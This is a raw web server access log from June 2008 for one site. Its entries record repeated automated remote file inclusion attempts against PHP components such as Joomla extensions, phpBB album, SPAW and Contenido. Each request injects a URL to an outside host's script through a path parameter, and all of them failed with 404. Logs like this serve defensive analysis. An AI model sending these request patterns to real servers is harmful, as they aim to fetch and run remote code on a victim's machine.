87.246.68.52 - - [30/Jun/2008:05:00:16 -0700] "GET /logs/access_071112.log//extcalendar.php?mosConfig_absolute_path=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:00:17 -0700] "GET //extcalendar.php?mosConfig_absolute_path=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:00:17 -0700] "GET /logs//extcalendar.php?mosConfig_absolute_path=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:00:34 -0700] "GET /logs/access_070813.log//extcalendar.php?mosConfig_absolute_path=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:05:01:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:05:01:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:05:01:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:05:01:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:01:09 -0700] "GET /logs/access_071029.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:01:09 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:01:10 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:01:13 -0700] "GET /logs/access_071015.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:01:23 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:01:23 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:01:23 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "summitcircle.com"
202.63.101.163 - - [30/Jun/2008:05:01:44 -0700] "GET /logs/access_071224.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:04:10 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:04:10 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:04:11 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:12 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:13 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:13 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:04:23 -0700] "GET /logs/access_071029.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:04:23 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:04:24 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:04:28 -0700] "GET /logs/access_071015.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:37 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:37 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:37 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:42 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:42 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:42 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
72.232.217.138 - - [30/Jun/2008:05:04:43 -0700] "GET /logs/access.log//contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.232.217.138 - - [30/Jun/2008:05:04:43 -0700] "GET //contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.232.217.138 - - [30/Jun/2008:05:04:43 -0700] "GET /logs//contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.232.217.138 - - [30/Jun/2008:05:04:43 -0700] "GET /logs/access_071111.log//contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:52 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:52 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:04:52 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:05:07 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:05:07 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:05:07 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:05:24 -0700] "GET /logs/access.log//contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:05:25 -0700] "GET //contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:05:25 -0700] "GET /logs//contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.52 - - [30/Jun/2008:05:05:25 -0700] "GET /logs/access_071111.log//contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
207.44.236.81 - - [30/Jun/2008:05:06:33 -0700] "GET /logs/access_080406.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.236.81 - - [30/Jun/2008:05:06:33 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.236.81 - - [30/Jun/2008:05:06:33 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.210.106.250 - - [30/Jun/2008:05:07:17 -0700] "GET /logs/access_071210.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.210.106.250 - - [30/Jun/2008:05:07:18 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.210.106.250 - - [30/Jun/2008:05:07:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.221.130.15 - - [30/Jun/2008:05:07:53 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
77.221.130.15 - - [30/Jun/2008:05:07:53 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:08:21 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:08:21 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:08:27 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:08:46 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:08:47 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:08:47 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:09:10 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:09:11 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:09:19 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:09:38 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:09:39 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:09:45 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:09:47 -0700] "GET /logs/access_071210.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:09:47 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:05:10:52 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:05:10:52 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:05:10:52 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.69.172.67 - - [30/Jun/2008:05:11:02 -0700] "GET /logs/access_080128.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
58.69.172.67 - - [30/Jun/2008:05:11:11 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
58.69.172.67 - - [30/Jun/2008:05:11:20 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:11:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:11:33 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:12:08 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:12:09 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:12:24 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.169.224.66 - - [30/Jun/2008:05:13:08 -0700] "GET /index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
72.21.34.26 - - [30/Jun/2008:05:13:19 -0700] "GET /wsnlinks/comments.php?id=122 HTTP/1.1" 404 275 "-" "-" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:05:13:42 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:05:13:42 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:05:13:42 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.10.47.122 - - [30/Jun/2008:05:13:46 -0700] "GET /logs/access_071029.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:28 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:30 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:32 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:39 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:41 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:41 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:42 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:47 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:48 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:50 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:53 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:57 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:58 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
61.63.1.134 - - [30/Jun/2008:05:14:58 -0700] "GET /logs/access_071224.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:14:58 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:02 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:02 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:03 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:07 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:10 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:10 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:10 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:11 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:15:12 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.10.47.122 - - [30/Jun/2008:05:15:31 -0700] "GET /logs/access_071015.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:16:06 -0700] "GET /logs/access_071210.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:16:07 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:16:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
63.247.139.189 - - [30/Jun/2008:05:16:26 -0700] "GET //includes/header.php?c_temp_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
63.247.139.189 - - [30/Jun/2008:05:16:27 -0700] "GET //includes/header.php?c_temp_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:16:30 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:16:30 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
